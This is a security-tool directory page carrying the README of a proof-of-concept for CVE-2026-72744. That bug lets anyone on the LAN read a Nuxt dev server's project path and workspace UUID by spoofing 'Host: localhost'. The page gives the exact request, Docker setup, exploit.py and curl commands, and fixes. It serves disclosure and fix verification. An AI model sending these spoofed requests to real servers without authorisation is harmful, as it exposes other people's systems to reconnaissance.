Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-72744-poc — CVE-2026-72744 的概念验证漏洞利用程序,该漏洞是 Nuxt 开发服务器 Chrome DevTools 工作区端点中的信息泄露漏洞。用于演示该缺陷并验证修复方案。 | Kitploit
工具/GitHubGitHub/saku0512/cve-2026-72744-poc
漏洞分析漏洞利用Web应用程序漏洞利用论文与研究学习与教育
GitHubsaku0512/cve-2026-72744-poc

CVE-2026-72744-poc

CVE-2026-72744 的概念验证漏洞利用程序,该漏洞是 Nuxt 开发服务器 Chrome DevTools 工作区端点中的信息泄露漏洞。用于演示该缺陷并验证修复方案。

查看仓库
5小时18分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-72744: Nuxt Chrome DevTools エンドポイントの情報漏えい PoC

English version

概要

このリポジトリは、Nuxt 開発サーバーの Chrome DevTools workspace エンドポイントに存在する情報漏えい脆弱性 CVE-2026-72744 の Proof of Concept (PoC) です。

脆弱な開発サーバーは、接続元がローカルかどうかを TCP peer address ではなく、 攻撃者が指定できる Host などの HTTP ヘッダーで判定します。開発サーバーが 0.0.0.0 に bind されている場合、LAN 上の未認証攻撃者は Host: localhost を付けたリクエストにより、プロジェクトの絶対パスと永続的な workspace UUID を取得できます。

このPoCは、Nuxt 4.5.0(脆弱版)と4.5.1(修正版)をDockerで起動し、ホスト側 から同じリクエストを送って挙動の違いを確認します。ファイルの読み書きやコード 実行は行いません。

免責事項

教育目的および許可されたセキュリティ検証にのみ使用してください。第三者の環境へ 無断でリクエストを送信しないでください。

脆弱性の詳細

  • CVE ID: CVE-2026-72744
  • 製品: Nuxt
  • 種別: 情報漏えい (CWE-200)
  • 影響を受けるバージョン: >= 4.4.7, < 4.5.1 および >= 3.21.7, < 3.21.10
  • 修正済みバージョン: 4.5.1 / 3.21.10
  • 対象: 開発サーバーのみ(production build は対象外)
  • 必要条件: ネットワーク到達可能な bind と、既定で有効な experimental.chromeDevtoolsProjectSettings
  • 影響: rootDir の絶対パスとプロジェクト固有 workspace UUID の漏えい

根本原因

脆弱版の isLocalDevRequest は、Host が許可リストに入り、ブラウザー由来の クロスサイトヘッダーがなければリクエストをローカルとして扱います。 非ブラウザークライアントはこれらのヘッダーを自由に省略・指定できるため、次の リクエストが検査を通過します。

root@kitploit:~
GET /.well-known/appspecific/com.chrome.devtools.json HTTP/1.1
Host: localhost

修正版は既存のヘッダー検査に加え、実際の TCP peer address が loopback (127.0.0.0/8 または ::1)であることを要求します。

Proof of Concept(使用方法)

1. 環境の起動

root@kitploit:~
docker compose up -d --build
URLバージョン想定結果
http://localhost:3000Nuxt 4.5.0HTTP 200、情報漏えい
http://localhost:3001Nuxt 4.5.1HTTP 403

初回ビルドでは npm パッケージを取得するため数分かかる場合があります。

2. 脆弱版の検証

root@kitploit:~
python3 exploit.py -t http://localhost:3000 --expect vulnerable

期待される出力:

root@kitploit:~
[!] VULNERABLE: the endpoint disclosed workspace.root and workspace.uuid.

3. 修正版の検証

root@kitploit:~
python3 exploit.py -t http://localhost:3001 --expect fixed

期待される出力:

root@kitploit:~
[+] FIXED: the non-loopback request was rejected with HTTP 403.

4. curlでの確認

root@kitploit:~
curl -i -H 'Host: localhost' \
  http://localhost:3000/.well-known/appspecific/com.chrome.devtools.json

curl -i -H 'Host: localhost' \
  http://localhost:3001/.well-known/appspecific/com.chrome.devtools.json

Docker のポート転送を経由するため、コンテナから見た接続元は loopback では ありません。これにより単一ホスト上で LAN 攻撃相当の条件を再現できます。

5. クリーンアップ

root@kitploit:~
docker compose down -v

PoCの判定条件

exploit.py は Host: localhost を指定し、Origin、Referer、 Sec-Fetch-Site を送らずに対象エンドポイントへアクセスします。HTTP 200 の JSONに文字列の workspace.root と workspace.uuid が含まれる場合のみ、脆弱と 判定します。HTTP 403 は修正済みの期待動作です。

対策

Nuxt 4系は 4.5.1以降、3系は 3.21.10以降へ更新してください。更新できない 場合は開発サーバーを loopback のみに bind するか、 experimental.chromeDevtoolsProjectSettings: false を設定してください。

参考情報

  • GitHub Security Advisory GHSA-7c4v-fwgw-9rf7
  • Nuxt 4.5.1 release
  • Fix commit
  • NVD: CVE-2026-72744
下载工具